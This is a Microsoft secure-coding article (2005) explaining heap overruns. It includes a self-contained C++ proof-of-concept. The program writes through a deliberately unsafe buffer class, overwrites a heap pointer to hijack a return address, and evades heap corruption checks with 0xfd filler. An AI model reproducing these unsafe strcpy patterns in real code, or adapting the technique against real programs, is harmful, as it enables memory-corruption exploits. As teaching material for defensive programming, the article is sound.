Share via


Heap Overruns

A heap overrun is much the same problem as a static buffer overrun, but it is more difficult to exploit. As in the case of a static buffer overrun, attackers can write arbitrary information into places in your application that they should not have access to. An excellent article is "w00w00 on Heap Overflows," written by Matt Conover of w00w00 Security Development (WSD). You can find this article at www.w00w00.org/files/articles/heaptut.txt.

The following application shows how a heap overrun can be exploited:

/*
  HeapOverrun.cpp
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
  Very flawed class to demonstrate a problem
*/

class BadStringBuf
{
public:
    BadStringBuf(void)
    {
        m_buf = NULL;
    }

    ~BadStringBuf(void)
    {
        if(m_buf != NULL)
            free(m_buf);
    }

    void Init(char* buf)
    {
        //Really bad code
        m_buf = buf;
    }

    void SetString(const char* input)
    {
        //This is stupid.
        strcpy(m_buf, input);
    }

    const char* GetString(void)
    {
        return m_buf;
    }

private:
    char* m_buf;
};

//Declare a pointer to the BadStringBuf class to hold our input.
BadStringBuf* g_pInput = NULL;

void bar(void)
{
    printf("You have been hacked!\n");
}

void BadFunc(const char* input1, const char* input2)
{
    //Someone said that heap overruns were not exploitable,
    //so allocate the buffer on the heap.

    char* buf = NULL;
    char* buf2;

    buf2 = (char*)malloc(16);
    g_pInput = new BadStringBuf;
    buf = (char*)malloc(16);
    //Bad programmer - no error checking on allocations

    g_pInput->Init(buf2);

    //The worst that can happen is a crash, right?
    strcpy(buf, input1);

    g_pInput->SetString(input2);

    printf("input 1 = %s\ninput2 = %s\n", buf, g_pInput->GetString());

    if(buf != NULL)
        free(buf);

}

int main(int argc, char* argv[])
{
    //Simulated argv strings
    char arg1[128];

    //This is the address of the bar function. 
    char arg2[4] = {0x0f, 0x10, 0x40, 0};    
    int offset = 0x40;  
                  
    //Using 0xfd is an evil trick to overcome heap corruption checking.
    //The 0xfd value at the end of the buffer checks for corruption.
    //No error checking here – it is just an example of how to 
    //construct an overflow string.
    memset(arg1, 0xfd, offset);
    arg1[offset]   = (char)0x94;
    arg1[offset+1] = (char)0xfe;
    arg1[offset+2] = (char)0x12;
    arg1[offset+3] = 0;
    arg1[offset+4] = 0;

    printf("Address of bar is %p\n", bar);
    BadFunc(arg1, arg2);

    if(g_pInput != NULL)
        delete g_pInput;

    return 0;
}

When you look at the above sample, you can imagine that BadFunc was written by a programmer who was told that heap overruns were not exploitable. That programmer has also written BadStringBuf, a C++ class to hold the input buffer pointer. Its best feature is its prevention of memory leaks by freeing the buffer in the destructor. If the BadStringBuf buffer is not initialized with memory allocation function, malloc, calling the free function might cause some problems.

An attacker would notice that this application blows up when either the first or second argument becomes too long. Also, the address of the error (indicated in the error message) shows that the memory corruption occurs up in the heap. The attacker then starts the program in a debugger and look for the location of the first input string. What valuable memory could possibly adjoin this buffer? A little investigation reveals that the second argument is written into another dynamically allocated buffer—where is the pointer to the buffer? Searching memory for the bytes corresponding to the address of the second buffer—the pointer to the second buffer is sitting there just 0x40 bytes past the location where the first buffer starts. Now the attacker can change this pointer to anything at all, and any string passed as the second argument will get written to any point in the process space of the application!

As in the first example, the goal of the attacker is to get the bar function to execute, so the next step is to overwrite the pointer to reference 0x0012fe94 (in this example), which in this case happens to be the location of the point in the stack where the return address for the BadFunc function is kept.

The attacker tailors the second string to set the memory at 0x0012fe94 to the location of the bar function (0x0040100f). In this approach, the attacker does not smash the stack, so a mechanism that might guard the stack will not notice that anything has changed. If he steps through the application, the attacker will get the following results:

Address of bar is 0040100F
input 1 = 2222222222222222222222222222222222222222222222222222ö??
input2 = *4@
You have been hacked!

Note that the attacker can run this code in debug mode and step through it because the Visual C++ debug mode stack checking does not apply to the heap.

Copyright © 2005 Microsoft Corporation.
All rights reserved.